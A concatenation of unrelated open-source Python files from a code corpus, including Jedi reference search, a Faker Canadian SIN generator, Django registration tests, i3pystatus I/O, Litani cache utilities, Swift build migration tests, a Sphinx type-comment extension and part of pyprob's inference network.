return set(_resolve_names(found_names))
def _find_names(module_context, tree_name):
name = module_context.create_name(tree_name)
found_names = set(name.goto())
found_names.add(name)
return set(_resolve_names(found_names))
def _add_names_in_same_context(context, string_name):
if context.tree_node is None:
return
until_position = None
while True:
filter_ = ParserTreeFilter(
parent_context=context,
until_position=until_position,
)
names = set(filter_.get(string_name))
if not names:
break
yield from names
ordered = sorted(names, key=lambda x: x.start_pos)
until_position = ordered[0].start_pos
def _find_global_variables(names, search_name):
for name in names:
if name.tree_name is None:
continue
module_context = name.get_root_context()
try:
method = module_context.get_global_filter
except AttributeError:
continue
else:
for global_name in method().get(search_name):
yield global_name
c = module_context.create_context(global_name.tree_name)
yield from _add_names_in_same_context(c, global_name.string_name)
def find_references(module_context, tree_name, only_in_module=False):
inf = module_context.inference_state
search_name = tree_name.value
# We disable flow analysis, because if we have ifs that are only true in
# certain cases, we want both sides.
try:
inf.flow_analysis_enabled = False
found_names = _find_defining_names(module_context, tree_name)
finally:
inf.flow_analysis_enabled = True
found_names_dct = _dictionarize(found_names)
module_contexts = [module_context]
if not only_in_module:
module_contexts.extend(
m for m in set(d.get_root_context() for d in found_names)
if m != module_context and m.tree_node is not None
)
# For param no search for other modules is necessary.
if only_in_module or any(n.api_type == 'param' for n in found_names):
potential_modules = module_contexts
else:
potential_modules = get_module_contexts_containing_name(
inf,
module_contexts,
search_name,
)
non_matching_reference_maps = {}
for module_context in potential_modules:
for name_leaf in module_context.tree_node.get_used_names().get(search_name, []):
new = _dictionarize(_find_names(module_context, name_leaf))
if any(tree_name in found_names_dct for tree_name in new):
found_names_dct.update(new)
for tree_name in new:
for dct in non_matching_reference_maps.get(tree_name, []):
# A reference that was previously searched for matches
# with a now found name. Merge.
found_names_dct.update(dct)
try:
del non_matching_reference_maps[tree_name]
except KeyError:
pass
else:
for name in new:
non_matching_reference_maps.setdefault(name, []).append(new)
result = found_names_dct.values()
if only_in_module:
return [n for n in result if n.get_root_context() == module_context]
return result
def _check_fs(inference_state, file_io, regex):
try:
code = file_io.read()
except FileNotFoundError:
return None
code = python_bytes_to_unicode(code, errors='replace')
if not regex.search(code):
return None
new_file_io = KnownContentFileIO(file_io.path, code)
m = load_module_from_path(inference_state, new_file_io)
if m.is_compiled():
return None
return m.as_context()
def gitignored_lines(folder_io, file_io):
ignored_paths = set()
ignored_names = set()
for l in file_io.read().splitlines():
if not l or l.startswith(b'#'):
continue
p = l.decode('utf-8', 'ignore')
if p.startswith('/'):
name = p[1:]
if name.endswith(os.path.sep):
name = name[:-1]
ignored_paths.add(os.path.join(folder_io.path, name))
else:
ignored_names.add(p)
return ignored_paths, ignored_names
def recurse_find_python_folders_and_files(folder_io, except_paths=()):
except_paths = set(except_paths)
for root_folder_io, folder_ios, file_ios in folder_io.walk():
# Delete folders that we don't want to iterate over.
for file_io in file_ios:
path = file_io.path
if path.suffix in ('.py', '.pyi'):
if path not in except_paths:
yield None, file_io
if path.name == '.gitignore':
ignored_paths, ignored_names = \
gitignored_lines(root_folder_io, file_io)
except_paths |= ignored_paths
folder_ios[:] = [
folder_io
for folder_io in folder_ios
if folder_io.path not in except_paths
and folder_io.get_base_name() not in _IGNORE_FOLDERS
]
for folder_io in folder_ios:
yield folder_io, None
def recurse_find_python_files(folder_io, except_paths=()):
for folder_io, file_io in recurse_find_python_folders_and_files(folder_io, except_paths):
if file_io is not None:
yield file_io
def _find_python_files_in_sys_path(inference_state, module_contexts):
sys_path = inference_state.get_sys_path()
except_paths = set()
yielded_paths = [m.py__file__() for m in module_contexts]
for module_context in module_contexts:
file_io = module_context.get_value().file_io
if file_io is None:
continue
folder_io = file_io.get_parent_folder()
while True:
path = folder_io.path
if not any(path.startswith(p) for p in sys_path) or path in except_paths:
break
for file_io in recurse_find_python_files(folder_io, except_paths):
if file_io.path not in yielded_paths:
yield file_io
except_paths.add(path)
folder_io = folder_io.get_parent_folder()
def get_module_contexts_containing_name(inference_state, module_contexts, name,
limit_reduction=1):
"""
Search a name in the directories of modules.
:param limit_reduction: Divides the limits on opening/parsing files by this
factor.
"""
# Skip non python modules
for module_context in module_contexts:
if module_context.is_compiled():
continue
yield module_context
# Very short names are not searched in other modules for now to avoid lots
# of file lookups.
if len(name) <= 2:
return
file_io_iterator = _find_python_files_in_sys_path(inference_state, module_contexts)
yield from search_in_file_ios(inference_state, file_io_iterator, name,
limit_reduction=limit_reduction)
def search_in_file_ios(inference_state, file_io_iterator, name, limit_reduction=1):
parse_limit = _PARSED_FILE_LIMIT / limit_reduction
open_limit = _OPENED_FILE_LIMIT / limit_reduction
file_io_count = 0
parsed_file_count = 0
regex = re.compile(r'\b' + re.escape(name) + r'\b')
for file_io in file_io_iterator:
file_io_count += 1
m = _check_fs(inference_state, file_io, regex)
if m is not None:
parsed_file_count += 1
yield m
if parsed_file_count >= parse_limit:
dbg('Hit limit of parsed files: %s', parse_limit)
break
if file_io_count >= open_limit:
dbg('Hit limit of opened files: %s', open_limit)
break
|
env/lib/python3.8/site-packages/faker/providers/ssn/en_CA/__init__.py | avdhari/enigma | 258 | 11195496 | # coding=utf-8
from __future__ import unicode_literals
from .. import Provider as SsnProvider
def checksum(sin):
"""
Determine validity of a Canadian Social Insurance Number.
Validation is performed using a modified Luhn Algorithm. To check
the Every second digit of the SIN is doubled and the result is
summed. If the result is a multiple of ten, the Social Insurance
Number is considered valid.
https://en.wikipedia.org/wiki/Social_Insurance_Number
"""
# Remove spaces and create a list of digits.
checksumCollection = list(sin.replace(' ', ''))
checksumCollection = [int(i) for i in checksumCollection]
# Discard the last digit, we will be calculating it later.
checksumCollection[-1] = 0
# Iterate over the provided SIN and double every second digit.
# In the case that doubling that digit results in a two-digit
# number, then add the two digits together and keep that sum.
for i in range(1, len(checksumCollection), 2):
result = checksumCollection[i] * 2
if result < 10:
checksumCollection[i] = result
else:
checksumCollection[i] = result - 10 + 1
# The appropriate checksum digit is the value that, when summed
# with the first eight values, results in a value divisible by 10
check_digit = 10 - (sum(checksumCollection) % 10)
check_digit = (0 if check_digit == 10 else check_digit)
return check_digit
class Provider(SsnProvider):
# In order to create a valid SIN we need to provide a number that
# passes a simple modified Luhn Algorithm checksum.
#
# This function reverses the checksum steps to create a random
# valid nine-digit Canadian SIN (Social Insurance Number) in the
# format '### ### ###'.
def ssn(self):
# Create an array of 8 elements initialized randomly.
digits = self.generator.random.sample(range(9), 8)
# The final step of the validation requires that all of the
# digits sum to a multiple of 10. First, sum the first 8 and
# set the 9th to the value that results in a multiple of 10.
check_digit = 10 - (sum(digits) % 10)
check_digit = (0 if check_digit == 10 else check_digit)
digits.append(check_digit)
# digits is now the digital root of the number we want
# multiplied by the magic number 121 212 121. The next step is
# to reverse the multiplication which occurred on every other
# element.
for i in range(1, len(digits), 2):
if digits[i] % 2 == 0:
digits[i] = (digits[i] // 2)
else:
digits[i] = (digits[i] + 9) // 2
# Build the resulting SIN string.
sin = ""
for i in range(0, len(digits)):
sin += str(digits[i])
# Add a space to make it conform to Canadian formatting.
if i in (2, 5):
sin += " "
# Finally return our random but valid SIN.
return sin
|
academicstoday_project/registration/tests.py | LeeDoona/EasyGrading | 146 | 11195550 | <filename>academicstoday_project/registration/tests.py<gh_stars>100-1000
from django.core.urlresolvers import resolve
from django.http import HttpRequest
from django.http import QueryDict
from django.test import TestCase
from django.test import Client
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
import json
from . import views
from captcha.models import CaptchaStore
# Contants
TEST_USER_EMAIL = "<EMAIL>"
TEST_USER_USERNAME = "Ledo"
TEST_USER_PASSWORD = "password"
class RegistrationTestCase(TestCase):
"""
python manage.py test registration
"""
def tearDown(self):
User.objects.all().delete()
def setUp(self):
captcha_count = CaptchaStore.objects.count()
self.failUnlessEqual(captcha_count, 0)
def test_url_resolves_to_register(self):
found = resolve('/register')
self.assertEqual(found.func, views.register)
def test_register_with_succesful_login(self):
# Extra parameters to make this a Ajax style request.
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
# Developer Notes:
# To get unit tests working with the django-simple-captcha then follow:
# http://stackoverflow.com/questions/3159284/how-to-unit-test-a-form-with-a-captcha-field-in-django
# Test
client = Client()
response = client.post('/register',{
'username': TEST_USER_USERNAME,
'password': <PASSWORD>,
'password_repeated': <PASSWORD>,
'first_name': 'Ledo',
'last_name': 'Dunno',
'email': TEST_USER_EMAIL,
'is_18_or_plus': True,
'captcha_0': 'dummy-value',
'captcha_1': 'PASSED',
},**kwargs)
# Verify: Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
# Verify: Successful response.
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'user registered')
self.assertEqual(array['status'], 'success')
# Verify: Database updated
try:
user = User.objects.get(email=TEST_USER_EMAIL)
except User.DoesNotExist:
user = None
self.assertEqual(user.username, TEST_USER_EMAIL) |
i3pystatus/core/io.py | fkusei/i3pystatus | 413 | 11195554 | import json
import signal
import sys
from contextlib import contextmanager
from threading import Condition
from threading import Thread
from i3pystatus.core.modules import IntervalModule
class IOHandler:
def __init__(self, inp=sys.stdin, out=sys.stdout):
self.inp = inp
self.out = out
def write_line(self, message):
"""Unbuffered printing to stdout."""
self.out.write(message + "\n")
self.out.flush()
def read(self):
"""Iterate over all input lines (Generator)"""
while True:
try:
yield self.read_line()
except EOFError:
return
def read_line(self):
"""
Interrupted respecting reader for stdin.
Raises EOFError if the end of stream has been reached
"""
try:
line = self.inp.readline().strip()
except KeyboardInterrupt:
raise EOFError()
# i3status sends EOF, or an empty line
if not line:
raise EOFError()
return line
class StandaloneIO(IOHandler):
"""
I/O handler for standalone usage of i3pystatus (w/o i3status)
Writing works as usual, but reading will always return a empty JSON array,
and the i3bar protocol header
"""
n = -1
proto = [
{
"version": 1,
"click_events": True,
}, "[", "[]", ",[]",
]
def __init__(self, click_events, modules, keep_alive, interval=1):
"""
StandaloneIO instance must be created in main thread to be able to set
the SIGUSR1 signal handler.
"""
super().__init__()
self.interval = interval
self.modules = modules
self.proto[0]['click_events'] = click_events
if keep_alive:
self.proto[0].update(dict(stop_signal=signal.SIGUSR2,
cont_signal=signal.SIGUSR2))
signal.signal(signal.SIGUSR2, self.suspend_signal_handler)
self.proto[0] = json.dumps(self.proto[0])
self.refresh_cond = Condition()
self.treshold_interval = 20.0
self.stopped = False
signal.signal(signal.SIGUSR1, self.refresh_signal_handler)
def read(self):
self.compute_treshold_interval()
self.refresh_cond.acquire()
while True:
try:
self.refresh_cond.wait(timeout=self.interval)
except KeyboardInterrupt:
self.refresh_cond.release()
return
yield self.read_line()
def read_line(self):
self.n += 1
return self.proto[min(self.n, len(self.proto) - 1)]
def compute_treshold_interval(self):
"""
Current method is to compute average from all intervals.
"""
intervals = [m.interval for m in self.modules if hasattr(m, "interval")]
if len(intervals) > 0:
self.treshold_interval = round(sum(intervals) / len(intervals))
def async_refresh(self):
"""
Calling this method will send the status line to i3bar immediately
without waiting for timeout (1s by default).
"""
self.refresh_cond.acquire()
self.refresh_cond.notify()
self.refresh_cond.release()
def refresh_signal_handler(self, signo, frame):
"""
This callback is called when SIGUSR1 signal is received.
It updates outputs of all modules by calling their `run` method.
Interval modules are updated in separate threads if their interval is
above a certain treshold value.
This treshold is computed by :func:`compute_treshold_interval` class
method.
The reasoning is that modules with larger intervals also usually take
longer to refresh their output and that their output is not required in
'real time'.
This also prevents possible lag when updating all modules in a row.
"""
if signo != signal.SIGUSR1:
return
for module in self.modules:
if hasattr(module, "interval"):
if module.interval > self.treshold_interval:
thread = Thread(target=module.run)
thread.start()
else:
module.run()
else:
module.run()
self.async_refresh()
def suspend_signal_handler(self, signo, frame):
"""
By default, i3bar sends SIGSTOP to all children when it is not visible (for example, the screen
sleeps or you enter full screen mode). This stops the i3pystatus process and all threads within it.
For some modules, this is not desirable. Thankfully, the i3bar protocol supports setting the "stop_signal"
and "cont_signal" key/value pairs in the header to allow sending a custom signal when these events occur.
Here we use SIGUSR2 for both "stop_signal" and "cont_signal" and maintain a toggle to determine whether
we have just been stopped or continued. When we have been stopped, notify the IntervalModule managers
that they should suspend any module that does not set the keep_alive flag to a truthy value, and when we
have been continued, notify the IntervalModule managers that they can resume execution of all modules.
"""
if signo != signal.SIGUSR2:
return
self.stopped = not self.stopped
if self.stopped:
[m.suspend() for m in IntervalModule.managers.values()]
else:
[m.resume() for m in IntervalModule.managers.values()]
class JSONIO:
def __init__(self, io, skiplines=2):
self.io = io
for i in range(skiplines):
self.io.write_line(self.io.read_line())
def read(self):
"""Iterate over all JSON input (Generator)"""
for line in self.io.read():
with self.parse_line(line) as j:
yield j
@contextmanager
def parse_line(self, line):
"""Parse a single line of JSON and write modified JSON back."""
prefix = ""
# ignore comma at start of lines
if line.startswith(","):
line, prefix = line[1:], ","
j = json.loads(line)
yield j
self.io.write_line(prefix + json.dumps(j))
|
auto_derby/single_mode/race/__init__.py | DoctrineAlanK/auto-derby | 235 | 11195555 | import logging
from .game_data import (
find,
find_by_date,
find_by_race_detail_image,
find_by_race_menu_image,
reload,
reload_on_demand,
)
from .globals import g
from .race import Race
from .race_result import RaceResult
# Deprecated: remove at next major version
LOGGER = logging.getLogger(__name__)
|
uC/AVR/stuff/FreeRTOSv202107.00/FreeRTOS/Test/litani/lib/litani.py | 4lc0n/PinToWin | 369 | 11195564 | <gh_stars>100-1000
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
import asyncio
import contextlib
import json
import logging
import os
import pathlib
import shutil
import sys
CACHE_FILE = "cache.json"
CACHE_POINTER = ".litani_cache_dir"
CI_STAGES = ["build", "test", "report"]
JOBS_DIR = "jobs"
RUN_FILE = "run.json"
TIME_FORMAT_R = "%Y-%m-%dT%H:%M:%SZ"
TIME_FORMAT_W = "%Y-%m-%dT%H:%M:%SZ"
TIME_FORMAT_MS = "%Y-%m-%dT%H:%M:%S.%fZ"
VERSION_MAJOR, VERSION_MINOR, VERSION_PATCH = 1, 10, 0
VERSION = "%d.%d.%d" % (VERSION_MAJOR, VERSION_MINOR, VERSION_PATCH)
class ExpireableDirectory:
"""This class is to mark directories as being safe for garbage collection"""
def __init__(self, path: pathlib.Path):
self._touchfile = path.resolve() / ".litani-expired"
def expire(self):
self._touchfile.touch()
def is_expired(self):
return self._touchfile.exists()
class AcquisitionFailed(Exception):
pass
class TimeoutExpired(Exception):
pass
class LockableDirectory:
"""POSIX-compliant directory locking"""
def __init__(self, path: pathlib.Path):
"""Directory is initially locked"""
self.path = path.resolve()
self._lock_file = self.path / ".litani-lock"
# Non-blocking =============================================================
def acquire(self):
"""Return True if acquisition was successful, False otherwise"""
try:
self._lock_file.unlink()
except OSError:
return False
else:
return True
def release(self):
self._lock_file.touch()
@contextlib.contextmanager
def try_acquire(self):
"""Automatically releases directory at the end of a block. Usage:
try:
with lock_dir.try_acquire():
# do stuff with locked dir
except report_directories.AcquisitionFailed:
# deal with it
"""
if not self.acquire():
raise AcquisitionFailed("directory: '%s'" % self.path)
yield
self.release()
# Async ====================================================================
async def acquire_wait(self, timeout=0):
"""Block until acquisition succeeds or timeout expires"""
while True:
if self.acquire():
return
timeout -= 1
if timeout == 0:
raise TimeoutExpired(
"directory: '%s', timeout: %d" % (self.path, timeout))
await asyncio.sleep(1)
@contextlib.contextmanager
async def try_acquire_wait(self, timeout=0):
"""Enter a context manager as soon as acquisition succeeds. Directory
will be released upon exit from context manager. Usage:
try:
with await lock_dir.try_acquire_wait(timeout=10):
# do stuff with locked dir
except report_directories.TimeoutExpired:
# deal with it
"""
with await self.acquire_wait(timeout):
yield
self.release()
def _get_cache_dir(path=os.getcwd()):
def cache_pointer_dirs():
current = pathlib.Path(path).resolve(strict=True)
yield current
while current.parent != current:
current = current.parent
yield current
current = pathlib.Path(os.getcwd()).resolve(strict=True)
for root, _, dirs in os.walk(current):
for dyr in dirs:
yield pathlib.Path(os.path.join(root, dyr))
for possible_dir in cache_pointer_dirs():
logging.debug(
"Searching for cache pointer in %s", possible_dir)
possible_pointer = possible_dir / CACHE_POINTER
try:
if possible_pointer.exists():
logging.debug(
"Found a cache pointer at %s", possible_pointer)
with open(possible_pointer) as handle:
pointer = handle.read().strip()
possible_cache = pathlib.Path(pointer)
if possible_cache.exists():
logging.debug("cache is at %s", possible_cache)
return possible_cache
logging.warning(
"Found a cache file at %s pointing to %s, but that "
"directory does not exist. Continuing search...",
possible_pointer, possible_cache)
except PermissionError:
pass
logging.error(
"Could not find a pointer to a litani cache. Did you forget "
"to run `litani init`?")
raise FileNotFoundError
def get_cache_dir(path=os.getcwd()):
try:
return _get_cache_dir(path)
except FileNotFoundError:
sys.exit(1)
def get_report_dir():
return get_cache_dir() / "html"
def get_report_data_dir():
return get_cache_dir() / "report_data"
def get_artifacts_dir():
return get_cache_dir() / "artifacts"
def get_status_dir():
return get_cache_dir() / "status"
@contextlib.contextmanager
def atomic_write(path, mode="w"):
try:
parent = pathlib.Path(path).parent
parent.mkdir(exist_ok=True, parents=True)
tmp = "%s~" % path
# pylint: disable=consider-using-with
handle = open(tmp, mode)
yield handle
except RuntimeError:
try:
os.unlink(tmp)
except RuntimeError:
pass
else:
handle.flush()
handle.close()
try:
os.rename(tmp, path)
except RuntimeError:
os.unlink(tmp)
def add_jobs_to_cache():
"""Adds individual Litani jobs in the jobs directory to the cache file
`litani add-job` adds jobs to individual JSON files so that it's possible to
run multiple parallel invocations of `litani add-job`. When all jobs have
been added, this method should be called so that all of the individual JSON
job files get added to the single cache file, ready to be run.
"""
jobs = []
cache_dir = get_cache_dir()
jobs_dir = cache_dir / JOBS_DIR
for job_file in os.listdir(jobs_dir):
with open(jobs_dir / job_file) as handle:
jobs.append(json.load(handle))
with open(cache_dir / CACHE_FILE) as handle:
cache = json.load(handle)
cache["jobs"] = jobs
with atomic_write(cache_dir / CACHE_FILE) as handle:
print(json.dumps(cache, indent=2), file=handle)
def unlink_expired():
"""Delete all report directories that are expired and unlocked"""
for data_dir in get_report_data_dir().iterdir():
lock_dir = LockableDirectory(data_dir)
if not lock_dir.acquire():
continue
expire_dir = ExpireableDirectory(data_dir)
if expire_dir.is_expired():
logging.debug("Unlinking %s", str(data_dir))
shutil.rmtree(data_dir)
# No need to release lock after deletion
else:
lock_dir.release()
|
utils/build_swift/tests/build_swift/test_migration.py | gandhi56/swift | 72,551 | 11195573 | <filename>utils/build_swift/tests/build_swift/test_migration.py
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2020 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
from __future__ import absolute_import, unicode_literals
import platform
import unittest
from build_swift import argparse
from build_swift import migration
from build_swift.constants import BUILD_SCRIPT_IMPL_PATH
import six
from swift_build_support.swift_build_support.targets import StdlibDeploymentTarget
# -----------------------------------------------------------------------------
# Helpers
def _get_sdk_targets(sdk_names):
targets = []
for sdk_name in sdk_names:
targets += StdlibDeploymentTarget.get_migrated_targets_for_sdk(sdk_name)
return targets
def _get_sdk_target_names(sdk_names):
return [target.name for target in _get_sdk_targets(sdk_names)]
# -----------------------------------------------------------------------------
# Mirgrate Swift SDKs
class TestMigrateSwiftSDKsMeta(type):
"""Metaclass used to dynamically generate test methods.
"""
def __new__(cls, name, bases, attrs):
# Generate tests for migrating each Swift SDK
for sdk_name in StdlibDeploymentTarget.get_all_migrated_sdks():
test_name = 'test_migrate_swift_sdk_{}'.format(sdk_name)
attrs[test_name] = cls.generate_migrate_swift_sdks_test(sdk_name)
return super(TestMigrateSwiftSDKsMeta, cls).__new__(
cls, name, bases, attrs)
@classmethod
def generate_migrate_swift_sdks_test(cls, sdk_name):
def test(self):
args = ['--swift-sdks={}'.format(sdk_name)]
args = migration.migrate_swift_sdks(args)
target_names = _get_sdk_target_names([sdk_name])
self.assertListEqual(args, [
'--stdlib-deployment-targets={}'.format(' '.join(target_names))
])
return test
@six.add_metaclass(TestMigrateSwiftSDKsMeta)
class TestMigrateSwiftSDKs(unittest.TestCase):
def test_empty_swift_sdks(self):
args = migration.migrate_swift_sdks(['--swift-sdks='])
self.assertListEqual(args, ['--stdlib-deployment-targets='])
def test_multiple_swift_sdk_flags(self):
sdks = ['OSX', 'IOS', 'IOS_SIMULATOR']
args = [
'--swift-sdks=',
'--swift-sdks={}'.format(';'.join(sdks))
]
args = migration.migrate_swift_sdks(args)
target_names = _get_sdk_target_names(sdks)
self.assertListEqual(args, [
'--stdlib-deployment-targets=',
'--stdlib-deployment-targets={}'.format(' '.join(target_names))
])
# -----------------------------------------------------------------------------
class TestMigrateParseArgs(unittest.TestCase):
def test_report_unknown_args(self):
parser = argparse.ArgumentParser()
parser.add_argument('-R', '--release', action='store_true')
parser.add_argument('-T', '--validation-test', action='store_true')
parser.add_argument('--darwin-xcrun-toolchain')
args = migration.parse_args(parser, [
'-RT',
'--unknown', 'true',
'--darwin-xcrun-toolchain=foo',
'--',
'--darwin-xcrun-toolchain=bar',
'--other',
])
expected = argparse.Namespace(
release=True,
validation_test=True,
darwin_xcrun_toolchain='bar',
build_script_impl_args=['--unknown', 'true', '--other'])
self.assertEqual(args, expected)
def test_no_unknown_args(self):
parser = argparse.ArgumentParser()
parser.add_argument('-R', '--release', action='store_true')
parser.add_argument('-T', '--validation-test', action='store_true')
parser.add_argument('--darwin-xcrun-toolchain')
args = migration.parse_args(
parser, ['-RT', '--darwin-xcrun-toolchain=bar'])
expected = argparse.Namespace(
release=True,
validation_test=True,
darwin_xcrun_toolchain='bar',
build_script_impl_args=[])
self.assertEqual(args, expected)
def test_forward_impl_args(self):
parser = argparse.ArgumentParser()
parser.add_argument('--skip-test-swift',
dest='impl_skip_test_swift',
action='store_true')
parser.add_argument('--install-swift',
dest='impl_install_swift',
action='store_true')
args = migration.parse_args(
parser, ['--skip-test-swift', '--install-swift'])
expected = argparse.Namespace(
build_script_impl_args=['--skip-test-swift', '--install-swift'])
self.assertEqual(args, expected)
class TestMigrationCheckImplArgs(unittest.TestCase):
def test_check_impl_args(self):
if platform.system() == 'Windows':
self.skipTest("build-script-impl cannot run in Windows")
return
self.assertIsNone(migration.check_impl_args(
BUILD_SCRIPT_IMPL_PATH, ['--reconfigure']))
with self.assertRaises(ValueError) as cm:
migration.check_impl_args(
BUILD_SCRIPT_IMPL_PATH, ['foo'])
self.assertIn('foo', str(cm.exception))
with self.assertRaises(ValueError) as cm:
migration.check_impl_args(
BUILD_SCRIPT_IMPL_PATH, ['--reconfigure', '--foo=true'])
self.assertIn('foo', str(cm.exception))
|
docs/autodoc/type_comment.py | ishine/cotk | 117 | 11195611 | <filename>docs/autodoc/type_comment.py
"""
autodoc.type_comment
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Update annotations info of living objects using type_comments.
:copyright: Copyright 2007-2020 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import ast
from inspect import getsource
from typing import Any, Dict
from typing import cast
import sphinx
from sphinx.application import Sphinx
from sphinx.pycode.ast import parse as ast_parse
from sphinx.pycode.ast import unparse as ast_unparse
from sphinx.util import inspect
from sphinx.util import logging
logger = logging.getLogger(__name__)
def get_type_comment(obj: Any) -> ast.FunctionDef:
"""Get type_comment'ed FunctionDef object from living object.
This tries to parse original code for living object and returns
AST node for given *obj*. It requires py38+ or typed_ast module.
"""
try:
source = getsource(obj)
if source.startswith((' ', r'\t')):
# subject is placed inside class or block. To read its docstring,
# this adds if-block before the declaration.
module = ast_parse('if True:\n' + source)
subject = cast(ast.FunctionDef, module.body[0].body[0]) # type: ignore
else:
module = ast_parse(source)
subject = cast(ast.FunctionDef, module.body[0]) # type: ignore
if getattr(subject, "type_comment", None):
return ast_parse(subject.type_comment, mode='func_type') # type: ignore
else:
return None
except (OSError, TypeError): # failed to load source code
return None
except SyntaxError: # failed to parse type_comments
return None
def update_annotations_using_type_comments(app: Sphinx, obj: Any, bound_method: bool) -> None:
"""Update annotations info of *obj* using type_comments."""
try:
function = get_type_comment(obj)
if function and hasattr(function, 'argtypes'):
if function.argtypes != [ast.Ellipsis]: # type: ignore
sig = inspect.signature(obj, bound_method)
for i, param in enumerate(sig.parameters.values()):
if param.name not in obj.__annotations__:
annotation = ast_unparse(function.argtypes[i]) # type: ignore
obj.__annotations__[param.name] = annotation
if 'return' not in obj.__annotations__:
obj.__annotations__['return'] = ast_unparse(function.returns) # type: ignore
except NotImplementedError as exc: # failed to ast.unparse()
logger.warning("Failed to parse type_comment for %r: %s", obj, exc)
def setup(app: Sphinx) -> Dict[str, Any]:
app.connect('autodoc-before-process-signature', update_annotations_using_type_comments)
return {'version': sphinx.__display_version__, 'parallel_read_safe': True}
|
pyprob/nn/inference_network.py | probprog/pyprob | 268 | 11195630 | import torch
import torch.nn as nn
import torch.optim as optim
import torch.optim.lr_scheduler as lr_scheduler
import torch.distributed as dist
from torch.utils.data import DataLoader
import sys
import time
import os
import shutil
import uuid
import tempfile
import tarfile
import copy
import math
from threading import Thread
from termcolor import colored
from . import Batch, OfflineDataset, TraceBatchSampler, DistributedTraceBatchSampler, EmbeddingFeedForward, EmbeddingCNN2D5C, EmbeddingCNN3D5C
from .optimizer_larc import LARC
from .. import __version__, util, Optimizer, LearningRateScheduler, ObserveEmbedding
class InferenceNetwork(nn.Module):
# observe_embeddings example: {'obs1': {'embedding':ObserveEmbedding.FEEDFORWARD, 'reshape': [10, 10], 'dim': 32, 'depth': 2}}
def __init__(self, model, observe_embeddings={}, network_type=''):
super().__init__()
self._model = model
self._layers_observe_embedding = nn.ModuleDict()
self._layers_observe_embedding_final = None
self._layers_pre_generated = False
self._layers_initialized = False
self._observe_embeddings = observe_embeddings
self._observe_embedding_dim = None
self._infer_observe = None
self._infer_observe_embedding = {}
self._optimizer = None
self._optimizer_type = None
self._optimizer_state = None
self._momentum = None
self._weight_decay = None
self._learning_rate_scheduler = None
self._learning_rate_scheduler_type = None
self._learning_rate_scheduler_state = None
self._total_train_seconds = 0
self._total_train_traces = 0
self._total_train_traces_end = None
self._total_train_iterations = 0
self._learning_rate_init = None
self._learning_rate_end = None
self._loss_init = None
self._loss_min = float('inf')
self._loss_max = None
self._loss_previous = float('inf')
self._history_train_loss = []
self._history_train_loss_trace = []
self._history_valid_loss = []
self._history_valid_loss_trace = []
self._history_num_params = []
self._history_num_params_trace = []
self._distributed_train_loss = util.to_tensor(0.)
self._distributed_valid_loss = util.to_tensor(0.)
self._distributed_history_train_loss = []
self._distributed_history_train_loss_trace = []
self._distributed_history_valid_loss = []
self._distributed_history_valid_loss_trace = []
self._modified = util.get_time_str()
self._updates = 0
self._on_cuda = False
self._device = torch.device('cpu')
self._learning_rate = None
self._momentum = None
self._batch_size = None
self._distributed_backend = None
self._distributed_world_size = None
self._network_type = network_type
def _init_layers_observe_embedding(self, observe_embeddings, example_trace):
if len(observe_embeddings) == 0:
raise ValueError('At least one observe embedding is needed to initialize inference network.')
observe_embedding_total_dim = 0
for name, value in observe_embeddings.items():
variable = example_trace.named_variables[name]
# distribution = variable.distribution
# if distribution is None:
# raise ValueError('Observable {}: cannot use this observation as an input to the inference network, because there is no associated likelihood.'.format(name))
# else:
if 'reshape' in value:
input_shape = torch.Size(value['reshape'])
print('Observable {}: reshape to {}.'.format(name, input_shape))
else:
input_shape = variable.value.size()
print('Observable {}: reshape not specified, using shape {}.'.format(name, input_shape))
if 'dim' in value:
output_shape = torch.Size([value['dim']])
print('Observable {}: using embedding dim {}.'.format(name, output_shape))
else:
print('Observable {}: embedding dim not specified, using the default 256.'.format(name))
output_shape = torch.Size([256])
if 'embedding' in value:
embedding = value['embedding']
print('Observable {}: using observe embedding {}.'.format(name, embedding))
else:
print('Observable {}: observe embedding not specified, using the default FEEDFORWARD.'.format(name))
embedding = ObserveEmbedding.FEEDFORWARD
if embedding == ObserveEmbedding.FEEDFORWARD:
if 'depth' in value:
depth = value['depth']
print('Observable {}: using embedding depth {}.'.format(name, depth))
else:
print('Observable {}: embedding depth not specified, using the default 2.'.format(name))
depth = 2
layer = EmbeddingFeedForward(input_shape=input_shape, output_shape=output_shape, num_layers=depth)
elif embedding == ObserveEmbedding.CNN2D5C:
layer = EmbeddingCNN2D5C(input_shape=input_shape, output_shape=output_shape)
elif embedding == ObserveEmbedding.CNN3D5C:
layer = EmbeddingCNN3D5C(input_shape=input_shape, output_shape=output_shape)
else:
raise ValueError('Unknown embedding: {}'.format(embedding))
layer.to(device=util._device)
self._layers_observe_embedding[name] = layer
observe_embedding_total_dim += util.prod(output_shape)
self._observe_embedding_dim = observe_embedding_total_dim
print('Observe embedding dimension: {}'.format(self._observe_embedding_dim))
self._layers_observe_embedding_final = EmbeddingFeedForward(input_shape=self._observe_embedding_dim, output_shape=self._observe_embedding_dim, num_layers=2)
self._layers_observe_embedding_final.to(device=util._device)
def _embed_observe(self, traces=None):
embedding = []
for name, layer in self._layers_observe_embedding.items():
values = torch.stack([util.to_tensor(trace.named_variables[name].value) for trace in traces]).view(len(traces), -1)
embedding.append(layer(values))
embedding = torch.cat(embedding, dim=1)
embedding = self._layers_observe_embedding_final(embedding)
return embedding
def _infer_init(self, observe=None):
self._infer_observe = observe
embedding = []
for name, layer in self._layers_observe_embedding.items():
value = util.to_tensor(observe[name]).view(1, -1)
embedding.append(layer(value))
